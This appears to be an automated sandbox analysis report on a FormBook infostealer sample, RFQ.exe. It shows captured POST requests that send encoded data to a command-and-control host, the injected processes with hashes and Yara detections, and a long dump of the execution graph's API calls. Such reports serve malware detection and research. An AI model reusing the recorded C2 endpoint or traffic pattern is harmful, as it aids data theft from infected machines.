                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 6a 3d 4a 6c 77 7a 49 5a 77 49 31 78 4a 46 71 6f 75 54 41 71 51 69 47 69 35 46 6e 5a 4a 65 70 2f 44 41 51 51 74 49 66 2f 46 30 54 38 77 70 2f 2f 50 61 66 74 62 67 73 71 43 44 57 67 4b 79 51 62 2f 77 4e 33 6c 31 34 51 48 6d 35 53 39 44 47 54 73 78 45 64 45 4d 4b 4e 38 2b 41 6c 73 64 2f 75 41 6c 66 71 62 6e 79 37 4a 34 63 32 59 44 4c 6a 44 6f 63 62 6c 64 47 52 51 77 57 52 77 35 63 42 53 4d 6c 73 39 58 76 55 42 51 75 69 37 4e 26 55 76 67 50 58 3d 6f 30 48 64 7a 68 62 70 49 36 67 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gx"}</script></head></html>


                                                                        Session ID: 37
                                                                        Source IP: 192.168.2.7
                                                                        Source Port: 49879
                                                                        Destination IP: 47.52.221.8
                                                                        Destination Port: 80
                                                                        PID: 3872
                                                                        Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 18:00:07.365875006 CET, Bytes transferred: 649, Direction: OUT
                                                                        Data:
                                                                        POST /9ezc/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.wukong.college
                                                                        Origin: http://www.wukong.college
                                                                        Referer: http://www.wukong.college/9ezc/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 75 70 74 4e 45 6e 31 68 79 43 49 76 32 4e 52 55 58 69 62 79 6d 65 34 7a 34 4d 72 56 59 72 78 6c 51 70 5a 33 4e 45 36 6b 30 43 5a 4f 6e 52 36 6a 35 68 44 71 35 30 6f 76 56 73 4e 46 6c 71 6e 78 54 39 71 78 73 64 31 48 35 6b 68 30 67 6e 70 79 61 74 51 63 71 78 6d 31 4a 4d 52 4e 4a 34 37 30 58 47 75 45 57 66 6c 65 43 57 77 74 48 41 50 4a 68 46 4d 6d 42 34 6c 61 64 73 46 50 70 4f 62 31 67 71 43 66 47 41 49 4c 4b 57 69 59 58 72 31 6e 34 4b 58 56 41 68 77 37 65 79 4b 38 71 4f 48 63 64 2f 46 43 31 4b 4a 77 79 55 6a 4e 32 54 2b 78 78 56 7a 78 33 47 31 50 76 63 54 6e 62 57 54 32 4e 31 46 34 77 3d 3d
                                                                        Data Ascii: 7j=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVAhw7eyK8qOHcd/FC1KJwyUjN2T+xxVzx3G1PvcTnbWT2N1F4w==
                                                                        Timestamp: Nov 7, 2024 18:00:08.341720104 CET, Bytes transferred: 390, Direction: IN
                                                                        Data:
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 17:00:08 GMT
                                                                        Server: Apache
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Content-Length: 179
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                        Session ID: 38
                                                                        Source IP: 192.168.2.7
                                                                        Source Port: 49880
                                                                        Destination IP: 47.52.221.8
                                                                        Destination Port: 80
                                                                        PID: 3872
                                                                        Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 18:00:09.915268898 CET, Bytes transferred: 669, Direction: OUT
                                                                        Data:
                                                                        POST /9ezc/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.wukong.college
                                                                        Origin: http://www.wukong.college
                                                                        Referer: http://www.wukong.college/9ezc/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 2f 78 6b 30 6c 5a 6c 38 45 36 6a 30 43 5a 46 48 52 2f 67 4a 68 79 71 35 77 57 76 51 4d 4e 46 6c 2b 6e 78 51 70 71 78 66 31 79 47 70 6b 30 2f 41 6e 76 74 4b 74 51 63 71 78 6d 31 4a 59 37 4e 4a 67 37 33 6e 32 75 48 79 4c 6d 41 53 57 7a 36 33 41 50 4e 68 45 6b 6d 42 35 43 61 66 59 37 50 72 6d 62 31 6c 75 43 66 55 6b 4c 42 4b 57 6b 47 6e 71 43 71 49 72 4a 56 51 31 49 2b 6f 75 4d 6b 4e 65 4d 5a 72 2b 6e 59 58 47 6c 75 6a 73 59 4a 30 33 49 6d 58 49 47 7a 32 43 74 43 4e 6f 79 34 73 7a 35 37 66 55 42 75 4d 2f 59 31 52 64 52 4a 47 55 53 75 77 55 76 71 59 6c 34 74 6b 55 3d
                                                                        Data Ascii: 7j=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujsYJ03ImXIGz2CtCNoy4sz57fUBuM/Y1RdRJGUSuwUvqYl4tkU=
                                                                        Timestamp: Nov 7, 2024 18:00:10.871099949 CET, Bytes transferred: 390, Direction: IN
                                                                        Data:
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 17:00:10 GMT
                                                                        Server: Apache
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Content-Length: 179
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                        Target ID:1
                                                                        Start time:11:57:04
                                                                        Start date:07/11/2024
                                                                        Path:C:\Users\user\Desktop\RFQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                        Imagebase:0x400000
                                                                        File size:1'338'211 bytes
                                                                        MD5 hash:85496E3BD4F547ED3ECB4BBA94401773
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:11:57:05
                                                                        Start date:07/11/2024
                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                        Imagebase:0xca0000
                                                                        File size:46'504 bytes
                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:11:57:13
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe"
                                                                        Imagebase:0xa50000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:11
                                                                        Start time:11:57:21
                                                                        Start date:07/11/2024
                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                        Imagebase:0x750000
                                                                        File size:47'104 bytes
                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:12
                                                                        Start time:13:55:13
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe"
                                                                        Imagebase:0xa50000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:14
                                                                        Start time:13:55:25
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff722870000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                          Execution Graph

                                                                          Execution Coverage:3.2%
                                                                          Dynamic/Decrypted Code Coverage:2.2%
                                                                          Signature Coverage:4.4%
                                                                          Total number of Nodes:1856
                                                                          Total number of Limit Nodes:36
                                                                          [Execution graph: node and edge listing of the interactive graph viewer (function addresses, API call names and call edges); not reproduced in this text rendering]
40d794 86503->86504 86505 40d78d FreeLibrary 86503->86505 86506 408f40 VariantClear 86504->86506 86505->86504 86507 40d79d 86506->86507 86508 408f40 VariantClear 86507->86508 86509 40d7a6 86508->86509 86509->86421 86516 4118da 46 API calls _doexit 86509->86516 86510->86394 86511->86398 86516->86421 86517->86424 86518->86432 86519->86440 86522 416b52 86520->86522 86523 416b8f 86522->86523 86524 416b70 Sleep 86522->86524 86528 41f677 86522->86528 86523->86438 86523->86443 86525 416b85 86524->86525 86525->86522 86525->86523 86526->86445 86527->86435 86529 41f683 86528->86529 86530 41f69e _malloc 86528->86530 86529->86530 86531 41f68f 86529->86531 86533 41f6b1 HeapAlloc 86530->86533 86535 41f6d8 86530->86535 86536 417f77 46 API calls __getptd_noexit 86531->86536 86533->86530 86533->86535 86534 41f694 86534->86522 86535->86522 86536->86534 86540 416b0d 86537->86540 86538 4135bb _malloc 45 API calls 86538->86540 86539 416b43 86539->86463 86540->86538 86540->86539 86541 416b24 Sleep 86540->86541 86542 416b39 86541->86542 86542->86539 86542->86540 86543->86476 86545 41377c __dosmaperr 86544->86545 86546 413753 RtlFreeHeap 86544->86546 86545->86474 86546->86545 86547 413768 86546->86547 86553 417f77 46 API calls __getptd_noexit 86547->86553 86549 41376e GetLastError 86549->86545 86554 417daa 86550->86554 86553->86549 86555 417dc9 setSBCS __call_reportfault 86554->86555 86556 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86555->86556 86559 417eb5 __call_reportfault 86556->86559 86558 417ed1 GetCurrentProcess TerminateProcess 86558->86482 86560 41a208 86559->86560 86561 41a210 86560->86561 86562 41a212 IsDebuggerPresent 86560->86562 86561->86558 86568 41fe19 86562->86568 86565 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86566 421ff0 __call_reportfault 86565->86566 86567 421ff8 GetCurrentProcess TerminateProcess 86565->86567 86566->86567 86567->86558 86568->86565 86569->86486 86573 408f48 moneypunct 86570->86573 86571 4265c7 
VariantClear 86572 408f55 moneypunct 86571->86572 86572->86491 86573->86571 86573->86572 86630 40ebd0 86574->86630 86634 4182cb 86577->86634 86579 41195e 86641 4181f2 LeaveCriticalSection 86579->86641 86581 40d748 86582 4119b0 86581->86582 86583 4119d6 86582->86583 86584 4119bc 86582->86584 86583->86499 86584->86583 86676 417f77 46 API calls __getptd_noexit 86584->86676 86586 4119c6 86677 417f25 10 API calls __wfsopen 86586->86677 86588 4119d1 86588->86499 86589->86501 86678 401f20 86590->86678 86592 40d5b6 IsDebuggerPresent 86593 40d5c4 86592->86593 86594 42e1bb MessageBoxA 86592->86594 86595 42e1d4 86593->86595 86596 40d5e3 86593->86596 86594->86595 86851 403a50 52 API calls 3 library calls 86595->86851 86748 40f520 86596->86748 86600 40d5fd GetFullPathNameW 86760 401460 86600->86760 86602 40d63b 86603 40d643 86602->86603 86604 42e231 SetCurrentDirectoryW 86602->86604 86605 40d64c 86603->86605 86852 432fee 6 API calls 86603->86852 86604->86603 86775 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86605->86775 86608 42e252 86608->86605 86610 42e25a GetModuleFileNameW 86608->86610 86612 42e274 86610->86612 86613 42e2cb GetForegroundWindow ShellExecuteW 86610->86613 86853 401b10 86612->86853 86616 40d688 86613->86616 86614 40d656 86615 40d669 86614->86615 86849 40e0c0 74 API calls setSBCS 86614->86849 86783 4091e0 86615->86783 86622 40d692 SetCurrentDirectoryW 86616->86622 86622->86503 86624 42e28d 86860 40d200 52 API calls 2 library calls 86624->86860 86627 42e299 GetForegroundWindow ShellExecuteW 86628 42e2c6 86627->86628 86628->86616 86629 40ec00 LoadLibraryA GetProcAddress 86629->86496 86631 40d72e 86630->86631 86632 40ebd6 LoadLibraryA 86630->86632 86631->86496 86631->86629 86632->86631 86633 40ebe7 GetProcAddress 86632->86633 86633->86631 86635 4182e0 86634->86635 86636 4182f3 EnterCriticalSection 86634->86636 86642 418209 86635->86642 86636->86579 86638 4182e6 86638->86636 86669 411924 46 API calls 3 library calls 86638->86669 86641->86581 
86643 418215 __wfsopen 86642->86643 86644 418225 86643->86644 86645 41823d 86643->86645 86670 418901 46 API calls 2 library calls 86644->86670 86647 416b04 __malloc_crt 45 API calls 86645->86647 86654 41824b __wfsopen 86645->86654 86649 418256 86647->86649 86648 41822a 86671 418752 46 API calls 9 library calls 86648->86671 86652 41825d 86649->86652 86653 41826c 86649->86653 86651 418231 86672 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86651->86672 86673 417f77 46 API calls __getptd_noexit 86652->86673 86657 4182cb __lock 45 API calls 86653->86657 86654->86638 86659 418273 86657->86659 86660 4182a6 86659->86660 86661 41827b InitializeCriticalSectionAndSpinCount 86659->86661 86662 413748 _free 45 API calls 86660->86662 86663 418297 86661->86663 86664 41828b 86661->86664 86662->86663 86675 4182c2 LeaveCriticalSection _doexit 86663->86675 86665 413748 _free 45 API calls 86664->86665 86666 418291 86665->86666 86674 417f77 46 API calls __getptd_noexit 86666->86674 86670->86648 86671->86651 86673->86654 86674->86663 86675->86654 86676->86586 86677->86588 86861 40e6e0 86678->86861 86682 401f41 GetModuleFileNameW 86879 410100 86682->86879 86684 401f5c 86891 410960 86684->86891 86687 401b10 52 API calls 86688 401f81 86687->86688 86894 401980 86688->86894 86690 401f8e 86691 408f40 VariantClear 86690->86691 86692 401f9d 86691->86692 86693 401b10 52 API calls 86692->86693 86694 401fb4 86693->86694 86695 401980 53 API calls 86694->86695 86696 401fc3 86695->86696 86697 401b10 52 API calls 86696->86697 86698 401fd2 86697->86698 86902 40c2c0 86698->86902 86700 401fe1 86701 40bc70 52 API calls 86700->86701 86702 401ff3 86701->86702 86920 401a10 86702->86920 86704 401ffe 86927 4114ab 86704->86927 86707 428b05 86709 401a10 52 API calls 86707->86709 86708 402017 86710 4114ab __wcsicoll 58 API calls 86708->86710 86711 428b18 86709->86711 86712 402022 86710->86712 86714 401a10 52 API calls 86711->86714 86712->86711 86713 40202d 86712->86713 86715 4114ab 
__wcsicoll 58 API calls 86713->86715 86716 428b33 86714->86716 86717 402038 86715->86717 86719 428b3b GetModuleFileNameW 86716->86719 86718 402043 86717->86718 86717->86719 86720 4114ab __wcsicoll 58 API calls 86718->86720 86721 401a10 52 API calls 86719->86721 86722 40204e 86720->86722 86723 428b6c 86721->86723 86724 402092 86722->86724 86728 401a10 52 API calls 86722->86728 86733 428b90 _wcscpy 86722->86733 86725 40e0a0 52 API calls 86723->86725 86727 4020a3 86724->86727 86724->86733 86726 428b7a 86725->86726 86729 401a10 52 API calls 86726->86729 86730 428bc6 86727->86730 86935 40e830 53 API calls 86727->86935 86731 402073 _wcscpy 86728->86731 86732 428b88 86729->86732 86739 401a10 52 API calls 86731->86739 86732->86733 86735 401a10 52 API calls 86733->86735 86741 4020d0 86735->86741 86736 4020bb 86936 40cf00 53 API calls 86736->86936 86738 4020c6 86740 408f40 VariantClear 86738->86740 86739->86724 86740->86741 86743 402110 86741->86743 86746 401a10 52 API calls 86741->86746 86937 40cf00 53 API calls 86741->86937 86938 40e6a0 53 API calls 86741->86938 86745 408f40 VariantClear 86743->86745 86747 402120 moneypunct 86745->86747 86746->86741 86747->86592 86749 4295c9 setSBCS 86748->86749 86750 40f53c 86748->86750 86752 4295d9 GetOpenFileNameW 86749->86752 87617 410120 86750->87617 86752->86750 86755 40d5f5 86752->86755 86753 40f545 87621 4102b0 SHGetMalloc 86753->87621 86755->86600 86755->86602 86756 40f54c 87626 410190 GetFullPathNameW 86756->87626 86758 40f559 87637 40f570 86758->87637 87699 402400 86760->87699 86762 40146f 86764 428c29 _wcscat 86762->86764 87708 401500 86762->87708 86765 40147c 86765->86764 87716 40d440 86765->87716 86767 401489 86767->86764 86768 401491 GetFullPathNameW 86767->86768 86769 402160 52 API calls 86768->86769 86770 4014bb 86769->86770 86771 402160 52 API calls 86770->86771 86772 4014c8 86771->86772 86772->86764 86773 402160 52 API calls 86772->86773 86774 4014ee 86773->86774 86774->86602 86776 428361 86775->86776 86777 4103fc 
LoadImageW RegisterClassExW 86775->86777 87736 44395e EnumResourceNamesW LoadImageW 86776->87736 87735 410490 7 API calls 86777->87735 86780 40d651 86782 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86780->86782 86781 428368 86782->86614 86784 409202 86783->86784 86785 42d7ad 86783->86785 86841 409216 moneypunct 86784->86841 87873 410940 331 API calls 86784->87873 87876 45e737 90 API calls 3 library calls 86785->87876 86788 409386 86789 40939c 86788->86789 87874 40f190 10 API calls 86788->87874 86789->86616 86850 401000 Shell_NotifyIconW setSBCS 86789->86850 86791 4095b2 86791->86789 86793 4095bf 86791->86793 86792 409253 PeekMessageW 86792->86841 87875 401a50 331 API calls 86793->87875 86795 40d410 VariantClear 86795->86841 86796 42d8cd Sleep 86796->86841 86797 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86797->86789 86800 4095f9 86797->86800 86799 42e13b 87894 40d410 VariantClear 86799->87894 86802 42e158 TranslateMessage DispatchMessageW GetMessageW 86800->86802 86802->86802 86805 42e188 86802->86805 86804 409567 PeekMessageW 86804->86841 86805->86789 86808 44c29d 52 API calls 86847 4094e0 86808->86847 86809 46fdbf 108 API calls 86809->86847 86810 46f3c1 107 API calls 86810->86841 86811 40e0a0 52 API calls 86811->86841 86812 409551 TranslateMessage DispatchMessageW 86812->86804 86814 42dcd2 WaitForSingleObject 86817 42dcf0 GetExitCodeProcess CloseHandle 86814->86817 86814->86841 86815 42dd3d Sleep 86815->86847 86816 47d33e 309 API calls 86816->86841 87883 40d410 VariantClear 86817->87883 86821 4094cf Sleep 86821->86847 86824 42d94d timeGetTime 87879 465124 53 API calls 86824->87879 86826 40c620 timeGetTime 86826->86847 86828 465124 53 API calls 86828->86847 86829 42dd89 CloseHandle 86829->86847 86831 42de19 GetExitCodeProcess CloseHandle 86831->86847 86832 401b10 52 API calls 86832->86847 86835 42de88 Sleep 86835->86841 86838 45e737 90 API calls 86838->86841 86841->86788 86841->86792 86841->86795 86841->86796 86841->86799 86841->86804 
86841->86810 86841->86811 86841->86812 86841->86814 86841->86815 86841->86816 86841->86821 86841->86824 86841->86838 86842 42e0cc VariantClear 86841->86842 86843 408f40 VariantClear 86841->86843 86841->86847 87737 4091b0 86841->87737 87795 40afa0 86841->87795 87821 408fc0 86841->87821 87856 408cc0 86841->87856 87870 4096a0 331 API calls 4 library calls 86841->87870 87871 40d150 TranslateAcceleratorW 86841->87871 87872 40d170 IsDialogMessageW GetClassLongW 86841->87872 87877 465124 53 API calls 86841->87877 87878 40c620 timeGetTime 86841->87878 87893 40e270 VariantClear moneypunct 86841->87893 86842->86841 86843->86841 86845 401980 53 API calls 86845->86847 86847->86808 86847->86809 86847->86826 86847->86828 86847->86829 86847->86831 86847->86832 86847->86835 86847->86841 86847->86845 86848 408f40 VariantClear 86847->86848 87880 45178a 54 API calls 86847->87880 87881 47d33e 331 API calls 86847->87881 87882 453bc6 54 API calls 86847->87882 87884 40d410 VariantClear 86847->87884 87885 443d19 67 API calls _wcslen 86847->87885 87886 4574b4 VariantClear 86847->87886 87887 403cd0 86847->87887 87891 4731e1 VariantClear 86847->87891 87892 4331a2 6 API calls 86847->87892 86848->86847 86849->86615 86850->86616 86851->86602 86852->86608 86854 401b16 _wcslen 86853->86854 86855 401b63 86854->86855 86856 4115d7 52 API calls 86854->86856 86859 40d200 52 API calls 2 library calls 86855->86859 86857 401b4b _memmove 86856->86857 86858 4115d7 52 API calls 86857->86858 86858->86855 86859->86624 86860->86627 86862 40bc70 52 API calls 86861->86862 86863 401f31 86862->86863 86864 402560 86863->86864 86865 40256d __write_nolock 86864->86865 86866 402160 52 API calls 86865->86866 86868 402593 86866->86868 86878 4025bd 86868->86878 86939 401c90 86868->86939 86869 4026f0 52 API calls 86869->86878 86870 4026a7 86871 401b10 52 API calls 86870->86871 86877 4026db 86870->86877 86872 4026d1 86871->86872 86943 40d7c0 52 API calls 2 library calls 86872->86943 86873 401b10 52 API calls 86873->86878 
86875 401c90 52 API calls 86875->86878 86877->86682 86878->86869 86878->86870 86878->86873 86878->86875 86942 40d7c0 52 API calls 2 library calls 86878->86942 86944 40f760 86879->86944 86882 410118 86882->86684 86884 42805d 86885 42806a 86884->86885 87000 431e58 86884->87000 86886 413748 _free 46 API calls 86885->86886 86888 428078 86886->86888 86889 431e58 82 API calls 86888->86889 86890 428084 86889->86890 86890->86684 86892 4115d7 52 API calls 86891->86892 86893 401f74 86892->86893 86893->86687 86895 4019a3 86894->86895 86896 401985 86894->86896 86895->86896 86897 4019b8 86895->86897 86898 40199f 86896->86898 87605 403e10 53 API calls 86896->87605 87606 403e10 53 API calls 86897->87606 86898->86690 86900 4019c4 86900->86690 86903 40c2c7 86902->86903 86904 40c30e 86902->86904 86907 40c2d3 86903->86907 86908 426c79 86903->86908 86905 40c315 86904->86905 86906 426c2b 86904->86906 86909 40c321 86905->86909 86910 426c5a 86905->86910 86912 426c4b 86906->86912 86913 426c2e 86906->86913 87607 403ea0 52 API calls __cinit 86907->87607 87612 4534e3 52 API calls 86908->87612 87608 403ea0 52 API calls __cinit 86909->87608 87611 4534e3 52 API calls 86910->87611 87610 4534e3 52 API calls 86912->87610 86919 40c2de 86913->86919 87609 4534e3 52 API calls 86913->87609 86919->86700 86919->86919 86921 401a30 86920->86921 86922 401a17 86920->86922 86924 402160 52 API calls 86921->86924 86923 401a2d 86922->86923 87613 403c30 52 API calls _memmove 86922->87613 86923->86704 86926 401a3d 86924->86926 86926->86704 86928 411523 86927->86928 86929 4114ba 86927->86929 87616 4113a8 58 API calls 3 library calls 86928->87616 86933 40200c 86929->86933 87614 417f77 46 API calls __getptd_noexit 86929->87614 86932 4114c6 87615 417f25 10 API calls __wfsopen 86932->87615 86933->86707 86933->86708 86935->86736 86936->86738 86937->86741 86938->86741 86940 4026f0 52 API calls 86939->86940 86941 401c97 86940->86941 86941->86868 86942->86878 86943->86877 87004 40f6f0 86944->87004 86946 40f77b _strcat 
